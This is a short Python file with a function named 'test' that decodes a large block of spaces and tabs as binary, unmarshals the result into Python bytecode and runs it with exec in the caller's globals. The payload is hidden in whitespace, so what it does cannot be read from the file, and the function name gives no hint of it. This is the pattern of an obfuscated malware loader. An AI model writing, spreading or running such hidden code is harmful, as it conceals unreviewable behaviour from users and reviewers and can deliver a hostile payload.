import marshal

def test(globals):
    exec(marshal.loads((lambda s:int(s.replace(chr(0xa),'').replace(chr(0x20),chr(0x30)).replace(chr(0x9),chr(0x31)),0b10).to_bytes(len(s)//8+1,'little'))('''	   		    	          	    	                                	   			  		             
                 	   					  		  	 	 		 		   			 	 	 		  
	   		 				 		 		 	  				      	   		 		 	               
                		 			  	                                  			  	                         
         			  	                                  			  	                            		 	
  			  	                              	   			  	       	   	 	  	 	  		
	                            		 	  			  	        	    		         	   	  	        
	   	           	   	  	        	     	         	    	 	        	    			        
	    			        	    	 	        	    		         	   	           	   		 	   
     	     	         	    	 	        	    			        	    			        	    	
 	        	   			         	    		         	    		        	     			        
	   	  	        	    	 	        	      	        	   	           	   	 		        
	     		        	    	          	    			        	    			        	      	      
  	  		  	        	                                 	    	  			  		                 
             		                           		 	  			  	                               		
 			  	                                  			  	                                  			  
	  		  	 	       			 		 	  			  		 		  	 	 			  	  
     		 	 		 	  			 	   			 	        	  	 		 	  			 
	         			 		 	  		   		       			 		 	  		   		 		
 			  			 	 	 		  		      	  		 		 	  	 	 	         	
		 		 	      			  	 	  	 		 			  		 				 		 	  
	 			 	   			     		  	 	 		   		 				    	   	 	    
	  			 		 	  			  	  		 				 			  	  			  	  
	   	 	 		 			  		 				 		 	  	 			 	   			  
	  		  	 	 			  		 			  		 	     	    			 		 		 
	                              	   			  	  	 					 	 					 		  
	 	 		 		 	 		    	 		 			  	 					 	 				
	    	   		 		 	  	 					 	 					 			  		 		
	  		 		    	 		 		   		   		 	 					 	 					
    	  			 		 	  			  	  			 	   			  		      			
	 		 	  		  	 	 		 		   			     			 	 	 			 	      
 	 			 		 	  			 	   			  		 		 	  	 		 		      
 	  		 		 	  		  	 	 		   		 		 			  		    	 		
	 	   			  		 		 			  		 	  	 			  		 		 	  	   
 	 	 		 		 	  			  		 		 		 	 		  	 	 			 	  
 		 	  	     	 			 		 	  			 	   		 			  		 	  	
 			  	  			         	 			 		 	  			  	  		 				
 			  	  			  	  	   	 	 				  	 		  	 	 	  	 		
    	   		 		 	  			  		 		 		   		    	 		   	  		
 				 		 		   		  			     					 		 	     		 	  
	 	  	  	    	 		  	 	 		   		 		 			  		  	 	 		
	 	   		 			  		  	 	 			  		  	      		    	  	      	
		 	   		   		 		  	 	 			  	  			  	  		 				 
		   		  	      		 				 			 	    	      			 			 		 
				 		 	     	      		  	   		  	 	 		 			  			  	
  		    	 		  	 	 		 		    	      			 	 	 		 				 
	 		  	  	       	    	 			  		 		 			  		 				 	
	 	  	 			 	   		    	 		 		   			 	 	 			 	   	
	    	 			  	  		  			 		 			  		 				 	    		  
		 			 				 	  		  	   		  	 	 			  		 			  	
	 		    	 	 	         		  	 		 	   	 	  	 			  		  	  	 
	  	       			 	  		  	 	 		  	   		 				 		   		  
	      			  	  			 	 	 		 				 				  	  	      		  
			 		 			  		 	  	 		 			  		 			  			 	 
	 			  	   	      		  	 	 		 		   		 	  	 		 	    		
	 			  	      			  	  		 				 			  	  			  	  		
  	 	  	 	     	      		  	   		  	 	 		 		   		 	  	 	
	    	 	   		   	 	 	  				 	  		  	   		  	 	 		 	
	   		 	  	 		    	 	   		      		  	 		 	   			 	  		
	 	   			 	 	 			     			 	   			 	 	 		 				  
	      			  	  			 	 	 		 				 	 		  	    		   		
		 	                              		  			  	   			 	  			 	   		
	 	 	 			     			 	   			 	 	 		 				  	      		  
	   		  	 	 			 	   		   		 		  	 	 			     				   
 	   	 	   	     				 	   			 	  			 	   			 	 	 	
		     		 			  	  	  	     		  				 	                             	  
  			  	  		 	    			  		 			 	 	 		 		   		  	
	      	 			 		 	        	  	 	  	 	 	 	    	 			        		
	 		 	   	      			 	   		 				 		 			   	       	 	
	   			  	  			 	   			  		  	      		    	  	      		  	
 	 		   	   	      			 	   			  		 			 	 	 		 		 
	  	      			 	   			 	 	 			     			 	   			 	 	 	
	 				  	      			  	  			 	 	 		 				 	 		  	  
	       	 			  		  	   		  	 	 		 		   		 	  	 		    	
 	   		   	  			 				 	                              	 	 			  	  
		  	   		 			  		  	 	      				 		 	        	  	 	  
	  	 			   	 			   	 			       		 				 	   	       		
	 	  			  		 			 	   			  		 		  	 	 			 	    	 
     		  			 		 			  		 	  	 		 			  		 			  
			 	 	 	 	  	     				 				 	  		  	 	 		   		 
		 			  		  	 	 			 	   		 			  		  	 	 			  
		 	 					 			 	   		   		 		  	 	 			  	  		
	  	  		 				 		   		  	      		  	   		  	 	 		 		
 	 		    	 		 			   	      		 			  		 				 		 	 
 	 			 	   		   		 		 			  			 	 	 		  		   	   
   		    	  	      		  	 	 		 			  		 	  	 		  		  	
	  	 	 		  	    	      			 	   			  		 			 	 	 		 	
	 	  	      			 	 	 		 				 	 		  	  		   	 				
 	  		  	 	 		   		 		 			  		  	 	 			 	   		 
			  		  	 	 			  		 	 					 			 	   		   		 
		  	 	 			  	  			  	  		 				 		   		   	     	 
		 	  		    	 			  	  			 	   				    	   	 	     	 	 
	 		 	  			  		 		   		 		 	  	 			  		 		    	 
	    	      		 		 		 	       	   	 	  	  	 			  		 	 		 
			  	  		 				 	 		  	 			 			 		  	 	 	  	
		  		 				 			 	   		  	 	 		 		 	 		 			
	 		   		 		 		   		  	 	 	 	 			   	   	 				 	
  		 	 		 			  	  		 				 	 		  	 			 			 
		  	 	 	  			  		 				 			 	   		  	 	 		 		
 	 		 				 		   		 		 		   		  	 	 			 			   
	     	 		 	   	 			  		 	  	 	  	         		 				 	  
		 	  	 		 	         	 		 		 	  			  		 		  	   		 
			  		  	 	 		 	  	 			  	  		  		   	 		   			
  		 		  			 		 			  		 	  	 			 	   		  	 	 
		  	 	 			  	  	   			   	   	 				 	  			  	  	
	  	 	 			 			 			  		 		 			  		    	     		 	
	 		 	  			 	   			 	 	 			     		 			  		 	  	 
    	 			 		 	       	   	 	  	  	 			  			  		 		  
	   		 			  		  	 	 		 	  	 			  	  		  		   	 	
	   			  		 		  			 		 			  		 	  	 			 	   	
	  	 	 		  	 	 			  	  	   			   	  	  				 	  		
	  		 		  	   		 			  		  	 	 		 	  	 			  	  		
  		   	 		   			  		 		  			 		 			  		 	  	 
			 	   		  	 	 		  	 	 			  	  		  			   	   	 	
			 	  	  			    			 	  	 	  	         	 	  		         		  
	                 	       		     		   			   		  	        	  			 	       
    	 	 			 		 	 	  			   	               	       		     		   	
	 		 		  	        	  			 	           	 		         	  		 			    
      	 		  	         	 		        		  						      		  			
		 	         		  	           	 	  		         		  	                 	      	 
	   		 	   	  		 		  	     	  	  		  	             	 		      		
  					     		 	  		  	        	  			 	     	 	   				
 	                	     		  					 	               		 		 	   			  
	        		  	        	 	  		 	 		    		   			 	               	     
      	 	  		         		  	                 	      	 	     		     	 	 		
			     		    		  	        	  			 	                 	      	 	     		
           		  	   	 			 		  	       	   					     	 		  	
	  	        	  			 	                 	      	 	     		           		  	    	
			 		  	       	   					     	 	 	 		  	        	  			 
	   						  			  	        		  	          	  		 	 		   	 	
   		  	        	  					                 	      	 	   		 	   	  		
 		  	     	  	  		  	     		  	 		  	        	  			 	         
        	               	               		     	  			  	        		  	        	 
	  		 	 		    	 		 			 	               	  	    	   		 			   
       	 	 			         	 	 				   		   			   	       		     
	     	 		 			 	  	   		   			  		      	 	     		           
		  	   	 			 		  	       	   					       	 	 					   
   	 	  			 	           	 	  		         		  	                 	      	 	
     		     	 	 					     		    		  	        	  			 	          
       	      	 	     		           		  	   	 			 		  	       	   	
				     	 		  		  	        	  			 	                 	      	 	     
		           		  	    				 		  	       	   					     	 	 	 
		  	        	  			 	     	 	   			  	        		  	          	  	
	 	 		   	 	   		  	        	  					                 	      	 	   
		 	   	  		 		  	     	  	  		  	             	 			   	   	 
		  	             	 			       		     		    	  	 		 	 	     	    	
	 	 	      	 	 					       			 			 	     	     		  	        
	  			 	     		    			  		       		  	          	 	     		     
			 			 	       	 	 					       	   			 	       	 	 		
			 	       		     		           		  	    				 		  	       	   	
				         	 					      		   		 			      	 	 				
	 	        	   			            		  	    				 		  	       	   			
		         	 					  	 		     			  	       	 	     		      	  
		  		      		  			 	       	 	 			 	             		  	    	
			 		  	       	   					       	   			 	       	   				
	 		  				  	 			 	         	   	        		 					  	 	
  		  				   	 	 		   				  	               	      	 	   		 
	    			  		  	      		 	 		  	             	 			      	  		
			      		   		  	        	  			 	        		 					 	      
	  					 	      	  	 			   	 	  	  	 			 	       		  	
             	   	          	 	    	      			 	              					   		 
     				          		  	             	 		            	 	  		         		 
 	                 	       		     		    	 		 		  	        	  			 	   
              	               	               	 	 			   			  	     	 	  		 
	 		       	 			 	               	     			   		 			          	 	 
			       	 					 	           		  	    	 	  		  	          	     
		         			 	      			  				  	         					 	      	 
	  			      	  	 		  	        	  		  			      	 	  			        
		 		  	      	    		  	       			 		  	        	 	  			       
 		 		  	       		  		  	       	 	 		  	        		 		  	
		      	 	  			        		 		  	        	  		  	        	  		  
	        	 	  			        		 		  	        	  		  	       	   		  	 
       	 	  			        		 		  	        	  		  	         	 		  	   
                      			  			  			  		                         	    		       
                     	 		                             			                                             
                    		   		                             	   			  	                           
       			  		                              	  		 	 		 		   		      	 
		 		 	  		 			  		 	  	 		  	   			 	   			  	
	     	 			 		 	                                  			  	                               
   			  	  		    	       			 		 	  			  	        			 	
	 	       	   	 	  	        	 	 	  	 	  			        	  	 	  	         
	 	  		      	  		 	 		       	 					           					       
                       	    			  		                         	    		                          
    	                               	                                                               	  		
   		     	 	  	 	  	         	 	  		     	   		  	                 	   
     	     		       	 		  	 	       	 	 		 	         	    	        		
 		  	        	  		  	           	 		 	         	    	         	 		  
	           		  	                             		 	  			  		                         
	                                    	                                                                               
                   		   		
''')),globals)